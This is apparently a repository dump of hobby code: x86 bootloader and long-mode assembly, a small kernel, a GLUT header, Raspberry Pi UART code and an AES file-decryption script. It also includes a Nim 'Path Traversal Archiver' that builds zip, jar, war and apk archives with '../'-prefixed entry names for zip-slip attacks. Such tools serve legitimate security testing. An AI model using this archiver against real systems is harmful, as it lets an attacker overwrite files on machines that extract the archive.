;---Code------------------------------------------------------------------------ 6 | Is_longmode_supported: 7 | ;********************************************************************; 8 | ; Check if Long mode is supported ; 9 | ;--------------------------------------------------------------------; 10 | ; Returns: eax = 0 if Long mode is NOT supported, else non-zero. 
; 11 | ;********************************************************************; 12 | mov eax, 0x80000000 ; Test if extended processor info in available. 13 | cpuid 14 | cmp eax, 0x80000001 15 | jb .not_supported 16 | 17 | mov eax, 0x80000001 ; After calling CPUID with EAX = 0x80000001, 18 | cpuid ; all AMD64 compliant processors have the longmode-capable-bit 19 | test edx, (1 << 29) ; (bit 29) turned on in the EDX (extended feature flags). 20 | 21 | jz .not_supported ; If it's not set, there is no long mode. 22 | ret 23 | 24 | .not_supported: 25 | xor eax, eax 26 | ret 27 | 28 | 29 | Enter_long_mode: 30 | ;********************************************************************; 31 | ; Enter long mode ; 32 | ;********************************************************************; 33 | mov edi, PAGING_DATA ; Point edi at the PAGING_DATA. 34 | mov eax, 10100000b ; Set the PAE and PGE bit. 35 | mov cr4, eax 36 | mov edx, edi ; Point CR3 at the PML4. 37 | mov cr3, edx 38 | mov ecx, 0xC0000080 ; Read from the EFER MSR. 39 | rdmsr 40 | or eax, 0x00000100 ; Set the LME bit. 41 | wrmsr 42 | mov ebx, cr0 ; Activate long mode 43 | or ebx,0x80000001 ; by enabling paging and protection simultaneously. 44 | mov cr0, ebx 45 | lgdt [GDT.Pointer] ; Load GDT.Pointer. 46 | jmp CODE_SEG:Kernel ; Load CS with 64 bit segment and flush the instruction cache. 47 | -------------------------------------------------------------------------------- /os/part5/stage2/e280_mapping.asm: -------------------------------------------------------------------------------- 1 | ; Author: Alamot 2 | 3 | BITS 16 4 | 5 | ;---Initialized data------------------------------------------------------------ 6 | e820_mmap_entries db 0 7 | e820_mmap_buffer: times 128*20 db 0 ; Allocate space for 128 E820 map entries. 
8 | 9 | ;---Code------------------------------------------------------------------------ 10 | Get_E820_map: 11 | ;******************************************************************************; 12 | ; Prepare paging ; 13 | ;------------------------------------------------------------------------------; 14 | ; Rerurns: ; 15 | ; bx = number of entries (Each entry is 20 bytes) ; 16 | ; es:di = start of array (you decide where) ; 17 | ;******************************************************************************; 18 | pusha ; Store registers 19 | push es 20 | xor ebx, ebx ; ebx = 0 (continuation value / entry counter) 21 | mov di, e820_mmap_buffer ; es:di = destination buffer 22 | xor ax, ax 23 | mov es, ax ; es = 0 (buffer below 1MB). 24 | .next_entry: 25 | mov eax, 0xE820 ; eax = 0xE820 26 | mov edx, 0x534D4150 ; edx = 'SMAP' 27 | mov ecx, 20 ; ecx = size of buffer (at least 20) 28 | mov [abs e820_mmap_entries], ebx ; Store number of entries 29 | int 0x15 ; Call BIOS interrupt 15 30 | jc .done ; CF=1 => Unsupported function (or error or end) 31 | cmp eax, 0x534D4150 ; On success, eax must have been reset to "SMAP" 32 | jne .done 33 | test ebx, ebx ; ebx = 0 => List is only 1 entry (worthless) 34 | je .done 35 | add di, 20 ; Next buffer slot 36 | cmp ebx, 128 ; Limit to 128 entries 37 | jae .done 38 | jmp .next_entry 39 | .done: 40 | pop es 41 | popa ; Restore registers 42 | ret 43 | -------------------------------------------------------------------------------- /crypto/cordova-aes.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # Author: Alamot 3 | import os 4 | import sys 5 | import glob 6 | import errno 7 | import base64 8 | from Crypto import Random 9 | from Crypto.Cipher import AES 10 | 11 | 12 | class AESCipher: 13 | def __init__(self, key, iv): 14 | self.key = key 15 | self.iv = iv 16 | 17 | def encrypt(self, source): 18 | cipher = AES.new(self.key, AES.MODE_CBC, self.iv) 19 | padding = 
AES.block_size - len(source) % AES.block_size 20 | data = source + chr(padding) * padding 21 | return base64.b64encode(cipher.encrypt(data)) 22 | 23 | def decrypt(self, source): 24 | cipher = AES.new(self.key, AES.MODE_CBC, self.iv) 25 | data = cipher.decrypt(base64.b64decode(source)) 26 | padding = ord(data[-1]) 27 | if data[-padding:] != chr(padding) * padding: 28 | raise ValueError("Invalid padding...") 29 | return data[:-padding] 30 | 31 | 32 | def makedir(directory): 33 | ''' Make a directory. ''' 34 | try: 35 | os.makedirs(directory) 36 | except OSError as e: 37 | if e.errno != errno.EEXIST: 38 | print("[E] makedir") 39 | 40 | 41 | if len(sys.argv) < 5 or sys.argv[1] not in ["dec", "enc"]: 42 | print("Usage: python cordova-aes.py ") 43 | sys.exit(1) 44 | 45 | action = sys.argv[1] 46 | key = sys.argv[2] 47 | iv = sys.argv[3] 48 | files = sys.argv[4:] 49 | cipher = AESCipher(key, iv) 50 | 51 | makedir(action) 52 | 53 | if type(files) == str: 54 | files = [files] 55 | 56 | for filename in files: 57 | out_path = action + "/" + filename 58 | with open(filename, 'r') as inf: 59 | data = inf.read() 60 | if action == "dec": 61 | data = data.replace('\n', '') 62 | with open(out_path, "w") as f: 63 | f.write(cipher.decrypt(data)) 64 | print("[+] Decrypted data have been written into '" + out_path + "'") 65 | elif action == "enc": 66 | with open(out_path, "w") as f: 67 | f.write(cipher.encrypt(data)) 68 | print("[+] Encrypted data have been written into '" + out_path + "'") 69 | -------------------------------------------------------------------------------- /os/part1/stage1/bootstage1.asm: -------------------------------------------------------------------------------- 1 | BITS 16 ; On the x86, the BIOS (and consequently the bootloader) runs in 16-bit Real Mode. 2 | ORG 0x7C00 ; We are loaded/booted by BIOS into this memory address. 3 | 4 | Stage1_entrypoint: ; Main entry point where BIOS leaves us. Some BIOS may load us at 0x0000:0x7C00 while others at 0x07C0:0x0000. 
We do a far jump to accommodate for this issue (CS is reloaded to 0x0000). 5 | jmp 0x0000:.setup_segments 6 | .setup_segments: 7 | ; Next, we set all segment registers to zero. 8 | xor ax, ax 9 | mov ss, ax 10 | mov ds, ax 11 | mov es, ax 12 | mov fs, ax 13 | mov gs, ax 14 | ; We set up a temporary stack so that it starts growing below Stage1_entrypoint (i.e. the stack base will be located at 0:0x7c00). 15 | mov sp, Stage1_entrypoint 16 | ; Clear direction flag (go forward in memory when using instructions like lodsb). 17 | cld 18 | 19 | ; Loading stage 2 from disk into RAM 20 | mov [disk], dl ; Storing disk number. BIOS loads into dl the "drive number" of the booted device. 21 | mov ax, (stage2_start-stage1_start)/512 ; ax: start sector 22 | mov cx, (kernel_end-stage2_start)/512 ; cx: number of sectors (512 bytes) to read 23 | mov bx, stage2_start ; bx: offset of buffer 24 | xor dx, dx ; dx: segment of buffer 25 | call Real_mode_read_disk 26 | 27 | ; Print "Stage 1 finished." message. 28 | mov si, stage1_message 29 | call Real_mode_println 30 | 31 | ; Jump to the entry point of stage 2 (commented out for now) 32 | ;;; jmp Stage2_entrypoint 33 | 34 | .halt: hlt ; Infinite loop. 35 | jmp .halt ; (It prevents from going off in memory and executing junk). 36 | 37 | 38 | ; Include 39 | %include "stage1/disk.asm" 40 | %include "stage1/print.asm" 41 | 42 | 43 | times 510-($-$$) db 0 ; Padding 44 | dw 0xAA55 ; The last two bytes of the boot sector should have the 0xAA55 signature. 45 | ; Otherwise, we'll get an error message from BIOS that it didn't find a bootable disk. 46 | ; This signature is represented in binary as 1010101001010101. The alternating bit 47 | ; pattern was thought to be a protection against certain (drive or controller) failures. 
48 | -------------------------------------------------------------------------------- /os/part2/stage1/bootstage1.asm: -------------------------------------------------------------------------------- 1 | BITS 16 ; On the x86, the BIOS (and consequently the bootloader) runs in 16-bit Real Mode. 2 | ORG 0x7C00 ; We are loaded/booted by BIOS into this memory address. 3 | 4 | Stage1_entrypoint: ; Main entry point where BIOS leaves us. Some BIOS may load us at 0x0000:0x7C00 while others at 0x07C0:0x0000. 5 | jmp 0x0000:.setup_segments ; We do a far jump to accommodate for this issue (CS is reloaded to 0x0000). 6 | .setup_segments: ; Next, we set all segment registers to zero. 7 | xor ax, ax 8 | mov ss, ax 9 | mov ds, ax 10 | mov es, ax 11 | mov fs, ax 12 | mov gs, ax 13 | mov sp, Stage1_entrypoint ; We set up a temporary stack so that it starts growing below Stage1_entrypoint (i.e. the stack base will be located at 0:0x7c00). 14 | cld ; Clear the direction flag (i.e. go forward in memory when using instructions like lodsb). 15 | 16 | ; Loading stage 2 from disk into RAM 17 | mov [disk], dl ; Storing disk number. BIOS loads into dl the "drive number" of the booted device. 18 | mov ax, (stage2_start-stage1_start)/512 ; ax: start sector 19 | mov cx, (kernel_end-stage2_start)/512 ; cx: number of sectors (512 bytes) to read 20 | mov bx, stage2_start ; bx: offset of buffer 21 | xor dx, dx ; dx: segment of buffer 22 | call Real_mode_read_disk 23 | 24 | ; Print "Stage 1 finished." message. 25 | mov si, stage1_message 26 | call Real_mode_println 27 | 28 | ; Jump to the entry point of stage 2 (commented out for now) 29 | jmp Stage2_entrypoint 30 | 31 | .halt: hlt 32 | jmp .halt ; Infinite loop (it prevents us from going off and executing other junk in memory). 
33 | 34 | 35 | ; Include 36 | %include "stage1/disk.asm" 37 | %include "stage1/print.asm" 38 | 39 | 40 | times 510-($-$$) db 0 ; Padding 41 | dw 0xAA55 ; The last two bytes of the boot sector should have the 0xAA55 signature. 42 | ; Otherwise, we'll get an error message from BIOS that it didn't find a bootable disk. 43 | ; This signature is represented in binary as 1010101001010101. The alternating bit 44 | ; pattern was thought to be a protection against certain (drive or controller) failures. 45 | -------------------------------------------------------------------------------- /os/part3/stage1/bootstage1.asm: -------------------------------------------------------------------------------- 1 | BITS 16 ; On the x86, the BIOS (and consequently the bootloader) runs in 16-bit Real Mode. 2 | ORG 0x7C00 ; We are loaded/booted by BIOS into this memory address. 3 | 4 | Stage1_entrypoint: ; Main entry point where BIOS leaves us. Some BIOS may load us at 0x0000:0x7C00 while others at 0x07C0:0x0000. 5 | jmp 0x0000:.setup_segments ; We do a far jump to accommodate for this issue (CS is reloaded to 0x0000). 6 | .setup_segments: ; Next, we set all segment registers to zero. 7 | xor ax, ax 8 | mov ss, ax 9 | mov ds, ax 10 | mov es, ax 11 | mov fs, ax 12 | mov gs, ax 13 | mov sp, Stage1_entrypoint ; We set up a temporary stack so that it starts growing below Stage1_entrypoint (i.e. the stack base will be located at 0:0x7c00). 14 | cld ; Clear the direction flag (i.e. go forward in memory when using instructions like lodsb). 15 | 16 | ; Loading stage 2 from disk into RAM 17 | mov [disk], dl ; Storing disk number. BIOS loads into dl the "drive number" of the booted device. 18 | mov ax, (stage2_start-stage1_start)/512 ; ax: start sector 19 | mov cx, (kernel_end-stage2_start)/512 ; cx: number of sectors (512 bytes) to read 20 | mov bx, stage2_start ; bx: offset of buffer 21 | xor dx, dx ; dx: segment of buffer 22 | call Real_mode_read_disk 23 | 24 | ; Print "Stage 1 finished." 
message. 25 | mov si, stage1_message 26 | call Real_mode_println 27 | 28 | ; Jump to the entry point of stage 2 (commented out for now) 29 | jmp Stage2_entrypoint 30 | 31 | .halt: hlt 32 | jmp .halt ; Infinite loop (it prevents us from going off and executing other junk in memory). 33 | 34 | 35 | ; Include 36 | %include "stage1/disk.asm" 37 | %include "stage1/print.asm" 38 | 39 | 40 | times 510-($-$$) db 0 ; Padding 41 | dw 0xAA55 ; The last two bytes of the boot sector should have the 0xAA55 signature. 42 | ; Otherwise, we'll get an error message from BIOS that it didn't find a bootable disk. 43 | ; This signature is represented in binary as 1010101001010101. The alternating bit 44 | ; pattern was thought to be a protection against certain (drive or controller) failures. 45 | -------------------------------------------------------------------------------- /os/part4/stage1/bootstage1.asm: -------------------------------------------------------------------------------- 1 | BITS 16 ; On the x86, the BIOS (and consequently the bootloader) runs in 16-bit Real Mode. 2 | ORG 0x7C00 ; We are loaded/booted by BIOS into this memory address. 3 | 4 | Stage1_entrypoint: ; Main entry point where BIOS leaves us. Some BIOS may load us at 0x0000:0x7C00 while others at 0x07C0:0x0000. 5 | jmp 0x0000:.setup_segments ; We do a far jump to accommodate for this issue (CS is reloaded to 0x0000). 6 | .setup_segments: ; Next, we set all segment registers to zero. 7 | xor ax, ax 8 | mov ss, ax 9 | mov ds, ax 10 | mov es, ax 11 | mov fs, ax 12 | mov gs, ax 13 | mov sp, Stage1_entrypoint ; We set up a temporary stack so that it starts growing below Stage1_entrypoint (i.e. the stack base will be located at 0:0x7c00). 14 | cld ; Clear the direction flag (i.e. go forward in memory when using instructions like lodsb). 15 | 16 | ; Loading stage 2 from disk into RAM 17 | mov [disk], dl ; Storing disk number. BIOS loads into dl the "drive number" of the booted device. 
18 | mov ax, (stage2_start-stage1_start)/512 ; ax: start sector 19 | mov cx, (kernel_end-stage2_start)/512 ; cx: number of sectors (512 bytes) to read 20 | mov bx, stage2_start ; bx: offset of buffer 21 | xor dx, dx ; dx: segment of buffer 22 | call Real_mode_read_disk 23 | 24 | ; Print "Stage 1 finished." message. 25 | mov si, stage1_message 26 | call Real_mode_println 27 | 28 | ; Jump to the entry point of stage 2 (commented out for now) 29 | jmp Stage2_entrypoint 30 | 31 | .halt: hlt 32 | jmp .halt ; Infinite loop (it prevents us from going off and executing other junk in memory). 33 | 34 | 35 | ; Include 36 | %include "stage1/disk.asm" 37 | %include "stage1/print.asm" 38 | 39 | 40 | times 510-($-$$) db 0 ; Padding 41 | dw 0xAA55 ; The last two bytes of the boot sector should have the 0xAA55 signature. 42 | ; Otherwise, we'll get an error message from BIOS that it didn't find a bootable disk. 43 | ; This signature is represented in binary as 1010101001010101. The alternating bit 44 | ; pattern was thought to be a protection against certain (drive or controller) failures. 45 | -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Linux/zpr.h: -------------------------------------------------------------------------------- 1 | #ifndef ZPR_H 2 | #define ZPR_H 3 | 4 | /* 5 | * Zoom-pan-rotate mouse manipulation module for GLUT 6 | * Version 0.4, October 2003 7 | * 8 | * Nigel Stewart 9 | * School of Computer Science and Information Technology 10 | * RMIT University 11 | * nigels@cs.rmit.edu.au 12 | * 13 | * Instructions 14 | * ------------ 15 | * 16 | * Call zprInit() immediately after your call to glutCreateWindow() 17 | * 18 | * The ZPR module handles glutReshapeFunc(), glutMouseFunc() and glutMotionFunc() 19 | * Applications should not bypass the ZPR handlers for reshape or mouse events. 
20 | * 21 | * Mouse manipulation of the GLUT window via the modelview matrix: 22 | * 23 | * Left button -> rotate 24 | * Middle button -> zoom 25 | * Right button -> pan 26 | * 27 | * Picking is also provided via two configurable callbacks: 28 | * 29 | * void zprSelectionFunc(void (*f)(void)) 30 | * 31 | * The draw function to be called in OpenGL selection 32 | * mode in response to a mouse-down button event. 33 | * 34 | * void zprPickFunc(void (*f)(GLint name)) 35 | * 36 | * The callback function which will receive the 37 | * top-most item of the name stack of the closest selection 38 | * hit. If there is no selection hit, -1 39 | * 40 | * Limitations 41 | * ----------- 42 | * 43 | * Works best with zprReferencePoint appropriately configured. 44 | * Works best with ortho projection. 45 | * You may need to use glEnable(GL_NORMALIZATION) for correct lighting. 46 | * Near and far clip planes are hard-coded. 47 | * Zooming and rotation is centered on the origin. 48 | * Only one window can use the callbacks at one time. 49 | * 50 | */ 51 | 52 | #ifdef WIN32 53 | #include 54 | #endif 55 | 56 | #include 57 | 58 | #ifdef __cplusplus 59 | extern "C" 60 | { 61 | #endif 62 | 63 | /* 64 | * 65 | */ 66 | 67 | /* Mouse Manipulation API */ 68 | 69 | void zprInit(); 70 | 71 | extern GLfloat zprReferencePoint[4]; 72 | 73 | /* Picking API (Optional) */ 74 | 75 | extern void zprSelectionFunc(void (*f)(void)); /* Selection-mode draw function */ 76 | extern void zprPickFunc(void (*f)(GLint name)); /* Pick event handling function */ 77 | 78 | /* 79 | * 80 | */ 81 | 82 | #ifdef __cplusplus 83 | } 84 | #endif 85 | 86 | #endif 87 | -------------------------------------------------------------------------------- /os/part5/stage1/bootstage1.asm: -------------------------------------------------------------------------------- 1 | ; Author: Alamot 2 | 3 | BITS 16 ; On the x86, the BIOS (and consequently the bootloader) runs in 16-bit Real Mode. 
4 | ORG 0x7C00 ; We are loaded/booted by BIOS into this memory address. 5 | 6 | Stage1_entrypoint: ; Main entry point where BIOS leaves us. Some BIOS may load us at 0x0000:0x7C00 while others at 0x07C0:0x0000. 7 | jmp 0x0000:.setup_segments ; We do a far jump to accommodate for this issue (CS is reloaded to 0x0000). 8 | .setup_segments: ; Next, we set all segment registers to zero. 9 | xor ax, ax 10 | mov ss, ax 11 | mov ds, ax 12 | mov es, ax 13 | mov fs, ax 14 | mov gs, ax 15 | mov sp, Stage1_entrypoint ; We set up a temporary stack so that it starts growing below Stage1_entrypoint (i.e. the stack base will be located at 0:0x7c00). 16 | cld ; Clear the direction flag (i.e. go forward in memory when using instructions like lodsb). 17 | 18 | ; Loading stage 2 from disk into RAM 19 | mov [disk], dl ; Storing disk number. BIOS loads into dl the "drive number" of the booted device. 20 | mov ax, (stage2_start-stage1_start)/512 ; ax: start sector 21 | mov cx, (kernel_end-stage2_start)/512 ; cx: number of sectors (512 bytes) to read 22 | mov bx, stage2_start ; bx: offset of buffer 23 | xor dx, dx ; dx: segment of buffer 24 | call Real_mode_read_disk 25 | 26 | ; Print "Stage 1 finished." message. 27 | mov si, stage1_message 28 | call Real_mode_println 29 | 30 | ; Jump to the entry point of stage 2 (commented out for now) 31 | jmp Stage2_entrypoint 32 | 33 | .halt: hlt 34 | jmp .halt ; Infinite loop (it prevents us from going off and executing other junk in memory). 35 | 36 | 37 | ; Include 38 | %include "stage1/disk.asm" 39 | %include "stage1/print.asm" 40 | 41 | 42 | times 510-($-$$) db 0 ; Padding 43 | dw 0xAA55 ; The last two bytes of the boot sector should have the 0xAA55 signature. 44 | ; Otherwise, we'll get an error message from BIOS that it didn't find a bootable disk. 45 | ; This signature is represented in binary as 1010101001010101. The alternating bit 46 | ; pattern was thought to be a protection against certain (drive or controller) failures. 
47 | -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/zpr.h: -------------------------------------------------------------------------------- 1 | #ifndef ZPR_H 2 | #define ZPR_H 3 | 4 | /* 5 | * Zoom-pan-rotate mouse manipulation module for GLUT 6 | * Version 0.4, October 2003 7 | * 8 | * Nigel Stewart 9 | * School of Computer Science and Information Technology 10 | * RMIT University 11 | * nigels@cs.rmit.edu.au 12 | * 13 | * Instructions 14 | * ------------ 15 | * 16 | * Call zprInit() immediately after your call to glutCreateWindow() 17 | * 18 | * The ZPR module handles glutReshapeFunc(), glutMouseFunc() and glutMotionFunc() 19 | * Applications should not bypass the ZPR handlers for reshape or mouse events. 20 | * 21 | * Mouse manipulation of the GLUT window via the modelview matrix: 22 | * 23 | * Left button -> rotate 24 | * Middle button -> zoom 25 | * Right button -> pan 26 | * 27 | * Picking is also provided via two configurable callbacks: 28 | * 29 | * void zprSelectionFunc(void (*f)(void)) 30 | * 31 | * The draw function to be called in OpenGL selection 32 | * mode in response to a mouse-down button event. 33 | * 34 | * void zprPickFunc(void (*f)(GLint name)) 35 | * 36 | * The callback function which will receive the 37 | * top-most item of the name stack of the closest selection 38 | * hit. If there is no selection hit, -1 39 | * 40 | * Limitations 41 | * ----------- 42 | * 43 | * Works best with zprReferencePoint appropriately configured. 44 | * Works best with ortho projection. 45 | * You may need to use glEnable(GL_NORMALIZATION) for correct lighting. 46 | * Near and far clip planes are hard-coded. 47 | * Zooming and rotation is centered on the origin. 48 | * Only one window can use the callbacks at one time. 
49 | * 50 | */ 51 | 52 | #ifdef WIN32 53 | #include 54 | #endif 55 | 56 | #include 57 | 58 | #ifdef __cplusplus 59 | extern "C" 60 | { 61 | #endif 62 | 63 | /* 64 | * 65 | */ 66 | 67 | /* Mouse Manipulation API */ 68 | 69 | void zprInit(); 70 | 71 | extern GLfloat zprReferencePoint[4]; 72 | 73 | /* Picking API (Optional) */ 74 | 75 | extern void zprSelectionFunc(void (*f)(void)); /* Selection-mode draw function */ 76 | extern void zprPickFunc(void (*f)(GLint name)); /* Pick event handling function */ 77 | 78 | /* 79 | * 80 | */ 81 | 82 | #ifdef __cplusplus 83 | } 84 | #endif 85 | 86 | #endif 87 | -------------------------------------------------------------------------------- /os/part3/kernel/kernel.asm: -------------------------------------------------------------------------------- 1 | BITS 64 ; We have entered the long mode! :) 2 | 3 | ;---Define---------------------------------------------------------------------- 4 | %define DATA_SEG 0x0010 5 | 6 | ;---Initialized data------------------------------------------------------------ 7 | hello_world_message dw 12 8 | db 'Hello World!' 9 | 10 | ticks_message dw 19 11 | db 'System timer ticks:' 12 | 13 | scancode_message dw 19 14 | db 'Keyboard scan code:' 15 | 16 | ;---Include--------------------------------------------------------------------- 17 | %include "kernel/idt.asm" 18 | %include "kernel/isr.asm" 19 | %include "kernel/video.asm" 20 | 21 | ;---Code------------------------------------------------------------------------ 22 | Kernel: 23 | lidt [IDTR] ; Load our IDTR 24 | 25 | mov al, 0x80 ; OCW1: Unmask all interrupts at master PIC 26 | out PIC1_DATA, al 27 | mov al, 0x80 ; OCW1: Unmask all interrupts at master PIC 28 | out PIC2_DATA, al 29 | 30 | ; Set all segments registers to DATA_SEG 31 | mov ax, DATA_SEG 32 | mov ds, ax 33 | mov es, ax 34 | mov fs, ax 35 | mov gs, ax 36 | mov ss, ax 37 | 38 | ; Clear the screen. 
39 | mov rax, 0x0020002000200020 ; Set background color to black (0) and 40 | ; character to blank space (20). 41 | call Fill_screen 42 | 43 | ; Print "Hello World!" at the upper right corner 44 | mov ah, 0x1E 45 | mov r8, 69 46 | mov r9, 1 47 | mov rsi, hello_world_message 48 | call Print 49 | 50 | ; Uncomment the following lines if you want to test the "Division by zero" exception. 51 | ; mov eax, 1 52 | ; mov ecx, 0 53 | ; div ecx 54 | 55 | .loop: 56 | ; Print system timer ticks. 57 | mov ah, VGA_COLOR_LIGHT_GREEN 58 | mov r8, 1 59 | mov r9, 2 60 | mov rsi, ticks_message 61 | Call Print 62 | mov r8, 21 63 | mov r9, 2 64 | mov r10, [systimer_ticks] 65 | call Print_hex 66 | ; Print keyboard scan code. 67 | mov ah, VGA_COLOR_LIGHT_CYAN 68 | mov r8, 1 69 | mov r9, 4 70 | mov rsi, scancode_message 71 | Call Print 72 | mov r8, 21 73 | mov r9, 4 74 | mov r10, [keyboard_scancode] 75 | call Print_hex 76 | jmp .loop ; Infinite loop. 77 | -------------------------------------------------------------------------------- /graphics/SutherlandHodgman/Windows/SutherlandHodgman/SutherlandHodgman.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | Header Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | Header Files 43 | 44 | 45 | Header Files 46 | 47 | 48 | Header Files 49 | 50 | 51 | Header Files 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 
-------------------------------------------------------------------------------- /path_traversal/path_traversal_archiver.nim: -------------------------------------------------------------------------------- 1 | import os 2 | import therapist 3 | import std/tables 4 | import std/streams 5 | import std/sequtils 6 | import std/strutils 7 | import zip/zipfiles 8 | 9 | let ext_mode = {".zip":fmWrite, ".jar":fmWrite, ".war":fmWrite, ".apk":fmWrite}.toOrderedTable 10 | let exts = toSeq(ext_mode.keys) 11 | 12 | let args = ( 13 | levels: newStringArg(@["-l", "--levels"], defaultVal="0-10", help="A single level or a range of levels to traverse."), 14 | os: newStringArg(@["-o", "--os"], defaultVal="unix", choices = @["unix", "win"], help="Target OS (unix|win)."), 15 | path: newStringArg(@["-p", "--path"], defaultVal="", help="Path to include (e.g. 'etc/')."), 16 | help: newHelpArg(@["-h", "--help"], help="Show this help message and exit"), 17 | file_to_add: newFileArg(@[""], help="File to add in the archive."), 18 | archive: newStringArg(@[""], help="Archive filename (Supported extensions are .zip, .jar, .war, .apk)."), 19 | ) 20 | 21 | 22 | proc make_traversal_path(path: string, level: int = 0, os: string = "unix"): string = 23 | if os == "win": 24 | let traversal = "..\\" 25 | let fullpath = traversal.repeat(level) & path 26 | return fullpath.replace("/", "\\").replace("\\\\", "\\") 27 | else: 28 | let traversal = "../" 29 | let fullpath = traversal.repeat(level) & path 30 | return fullpath.replace("\\", "/").replace("//", "/") 31 | 32 | 33 | args.parseOrHelp(prolog="Path Traversal Archiver: A tool to create archives containing path-traversal filenames (e.g. 
'../../etc/passwd').") 34 | 35 | var start = 0 36 | var final = 0 37 | try: 38 | if "-" in args.levels.value: 39 | let values = split(args.levels.value, "-") 40 | start = parseInt(values[0]) 41 | final = parseInt(values[1]) 42 | else: 43 | start = parseInt(args.levels.value) 44 | final = start 45 | except ValueError: 46 | "Please specify a single level (e.g. 3) or a level range (e.g. 1-10) for path traversal.".quit(-1) 47 | 48 | let splittedFile = splitFile(args.archive.value) 49 | let path = args.path.value & lastPathPart(args.file_to_add.value) 50 | 51 | if not ext_mode.hasKey(splittedFile.ext): 52 | let message = "Please specify a supported extention " & $exts & " in the archive filename: " & args.archive.value 53 | message.quit(-1) 54 | elif splittedFile.ext in [".zip", ".jar", ".war", ".apk"]: 55 | echo "Creating archive " & args.archive.value 56 | var z: ZipArchive 57 | if z.open(args.archive.value, ext_mode[splittedFile.ext]): 58 | for i in countup(start, final): 59 | let fullpath = make_traversal_path(path, level=i, os=args.os.value) 60 | echo "[+] Adding " & fullpath 61 | z.addFile(fullpath, newFileStream(args.file_to_add.value, fmRead)) 62 | z.close() 63 | else: 64 | let message = "Extention '" & splittedFile.ext & "' not supported." 65 | message.quit(-1) 66 | -------------------------------------------------------------------------------- /os/part2/stage2/longmode.asm: -------------------------------------------------------------------------------- 1 | ; Author: Alamot 2 | 3 | BITS 16 4 | 5 | ;---Code------------------------------------------------------------------------ 6 | Is_longmode_supported: 7 | ;********************************************************************; 8 | ; Check if Long mode is supported ; 9 | ;--------------------------------------------------------------------; 10 | ; Returns: eax = 0 if Long mode is NOT supported, else non-zero. 
; 11 | ;********************************************************************; 12 | mov eax, 0x80000000 ; Test if extended processor info in available. 13 | cpuid 14 | cmp eax, 0x80000001 15 | jb .not_supported 16 | mov eax, 0x80000001 ; After calling CPUID with EAX = 0x80000001, 17 | cpuid ; all AMD64 compliant processors have the longmode-capable-bit 18 | test edx, (1 << 29) ; (bit 29) turned on in the EDX (extended feature flags). 19 | jz .not_supported ; If it's not set, there is no long mode. 20 | ret 21 | .not_supported: 22 | xor eax, eax 23 | ret 24 | 25 | 26 | Enter_long_mode: 27 | ;********************************************************************; 28 | ; Enter long mode ; 29 | ;********************************************************************; 30 | mov edi, PML4 ; Point edi at the PML4 31 | mov eax, 10100000b ; Set the PAE and PGE bit. 32 | mov cr4, eax 33 | mov edx, edi ; Point CR3 at the PML4. 34 | mov cr3, edx 35 | mov ecx, 0xC0000080 ; Read from the EFER MSR. 36 | rdmsr 37 | or eax, 0x00000100 ; Set the LME bit. 38 | wrmsr 39 | mov ebx, cr0 ; Activate long mode 40 | or ebx,0x80000001 ; by enabling paging and protection simultaneously. 41 | mov cr0, ebx 42 | lgdt [rel GDTR] ; Load GDT.Pointer 43 | jmp CODE_SEL:LONGMODE ; Mode-Switch Jump (Load CS & flush instruction cache) 44 | LONGMODE: 45 | BITS 64 ; We have entered the long mode! :) 46 | mov ax, DATA_SEL ; Set all segments registers to DATA_SEL. 
47 | mov ds, ax 48 | mov es, ax 49 | mov fs, ax 50 | mov gs, ax 51 | mov ss, ax 52 | mov rax, KERNEL_VIRT_BASE + HIGH_KERNEL 53 | jmp rax ; Jump to high-address mapped kernel 54 | HIGH_KERNEL: 55 | lea rax, [rel GDT] ; Load our high-address GDT 56 | mov [rel GDTR.Base], rax 57 | lgdt [rel GDTR] 58 | add rsp, KERNEL_VIRT_BASE ; Point rsp (stack) to its high address 59 | mov qword [abs KERNEL_VIRT_BASE + PML4], 0 ; Clear PML4[0] (identity entry) 60 | mov rax, cr3 ; Flush the TLB (Translation Lookaside Buffer) 61 | mov cr3, rax ; Reload CR3 to flush TLB 62 | jmp Kernel_entrypoint ; Jump to Kernel entrypoint 63 | -------------------------------------------------------------------------------- /raspberry_pi_os/part1/uart.S: -------------------------------------------------------------------------------- 1 | /*---Constants----------------------------------------------------------------*/ 2 | 3 | // Raspberry Pi 3B+ 4 | .equ PERIPH_BASE, 0x3F000000 /* <--- Uncomment this for Pi 3 */ 5 | 6 | // Raspberry Pi 4B 7 | //.equ PERIPH_BASE, 0xFE000000 /* <--- Uncomment this for Pi 4 */ 8 | 9 | .equ UART0_BASE, (PERIPH_BASE + 0x201000) // UART base address 10 | .equ UART0_DR, (UART0_BASE + 0x00) // UART Data Register 11 | .equ UART0_FR, (UART0_BASE + 0x18) // UART Flag Register 12 | .equ TXFF_BIT, (1 << 5) // Transmit FIFO Full bit 13 | 14 | 15 | /*---Code---------------------------------------------------------------------*/ 16 | .section ".text" 17 | .global uart_puts 18 | uart_puts: 19 | /******************************************************************************/ 20 | /* Sends a string to UART (PL011). */ 21 | /******************************************************************************/ 22 | /* x20: The address of the string */ 23 | /******************************************************************************/ 24 | stp lr, xzr, [sp, #-16]! // Store Link Register (has the return address) 25 | stp x21, x22, [sp, #-16]! 
// Store registers that will be used
    ldrh w21, [x20], #2                 // Load length into w21 (needs 2-byte alignment!)
1:  ldrb w22, [x20], #1                 // Load a byte into w22 (then increase x20 by 1)
    bl uart_putc                        // Call uart_putc (Link Register will be written)
